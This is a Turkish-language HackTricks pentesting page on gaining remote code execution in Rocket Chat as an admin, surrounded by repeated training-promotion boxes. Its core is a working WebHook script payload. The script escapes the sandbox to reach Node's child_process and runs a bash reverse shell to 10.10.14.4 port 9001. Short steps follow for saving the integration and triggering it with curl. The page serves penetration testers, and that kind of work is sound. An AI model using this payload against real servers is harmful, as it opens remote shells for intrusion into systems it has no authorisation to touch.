hacktricks/network-services-pentesting/pentesting-web/rocket-chat.md

4.1 KiB
Raw Blame History

Rocket Chat

{% hint style="success" %} AWS Hacking'i öğrenin ve pratik yapın:HackTricks Training AWS Red Team Expert (ARTE)
GCP Hacking'i öğrenin ve pratik yapın: HackTricks Training GCP Red Team Expert (GRTE)

HackTricks'i Destekleyin
{% endhint %} {% endhint %}

{% embed url="https://websec.nl/" %}

RCE

Eğer Rocket Chat içinde admin iseniz RCE alabilirsiniz.

  • Integrations bölümüne gidin ve New Integration seçeneğini seçin, ardından herhangi birini seçin: Incoming WebHook veya Outgoing WebHook.
  • /admin/integrations/incoming
const require = console.log.constructor('return process.mainModule.require')();
const { exec } = require('child_process');
exec("bash -c 'bash -i >& /dev/tcp/10.10.14.4/9001 0>&1'")
  • WebHook'u yapılandırın (kanal ve kullanıcı adı olarak gönderi mevcut olmalıdır):
  • WebHook betiğini yapılandırın:
  • Değişiklikleri kaydedin
  • Oluşturulan WebHook URL'sini alın:
  • curl ile çağırın ve rev shell almanız gerekir

{% embed url="https://websec.nl/" %} {% hint style="success" %} AWS Hacking'i öğrenin ve pratik yapın:HackTricks Training AWS Red Team Expert (ARTE)
GCP Hacking'i öğrenin ve pratik yapın: HackTricks Training GCP Red Team Expert (GRTE)

HackTricks'i Destekleyin
{% endhint %} {% endhint %}